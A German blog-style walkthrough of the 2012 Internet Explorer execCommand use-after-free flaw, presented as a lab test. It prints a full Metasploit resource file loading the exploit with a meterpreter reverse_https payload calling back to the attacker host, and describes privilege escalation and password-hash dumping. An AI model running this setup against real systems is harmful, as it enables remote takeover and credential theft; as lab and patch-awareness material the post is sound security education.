Am 17.09.2012 wurde eine kritische Schwachstelle Microsoft Internet Explorer bekannt. Betroffen sind IT-Systeme, die die Software in den Versionen 6, 7, 8 oder 9 unter den Betriebssystemen Microsoft Windows XP, Microsoft Windows Vista oder Microsoft Windows 7 verwenden. Die Schwachstelle wird bereits in gezielten Angriffen ausgenutzt. Um die Schwachstelle auszunutzen reicht es aus, den Internetnutzer auf eine präparierte Webseite zu locken. Beim Anzeigen dieser Webseite kann dann durch Ausnutzen der Schwachstelle beliebiger Code auf dem betroffenen System mit den Rechten des Nutzers ausgeführt werden.
Um die eigenen Systeme testen zu können, wurde ein Metasploit-Modul herausgebraucht.
Im Folgenden wird die Handhabung in einem Testnetzwerk kurz beschrieben und in einem Video erläutert. Der Angreifer nutzt Backtrack 5 R3 (IP: 192.168.222.16) und das Metasploit-Framework. Auf dem Zielsystem (IP: 192.168.222.71) ist Windows 7 und der Internet Explorer 8 installiert.
Mittels der folgenden Resource-Datei (ie0day.rc) wird das entsprechende Module geladen, die Serverparameter eingestellt und der Payload ausgewählt. Nach der Ausführung nimmt das Angriffssystem „Anfragen“ auf Port 80 entgegen.
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.222.16
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.222.16
set LPORT 443
set URIPATH /
exploit
Sobald das Zielsytem die URL http://192.168.222.16 im Internet Explorer öffnet, wird der Exploit ausgeführt und der entsprechende Payload (in diesem Fall windows/meterpreter/reverse_https) nachgeladen. Nun können beliebige Meterpreter-Skripte ausgeführt werden. Im Video werden die Nutzerrechte zu Systemrechten eskaliert und die Passwort-Hashes ausgelesen.
Update 22.09.12: Microsoft hat die Internet-Explorer-Lücke mit einem Patch geschlossen. Ein Update wird dringend empfohlen.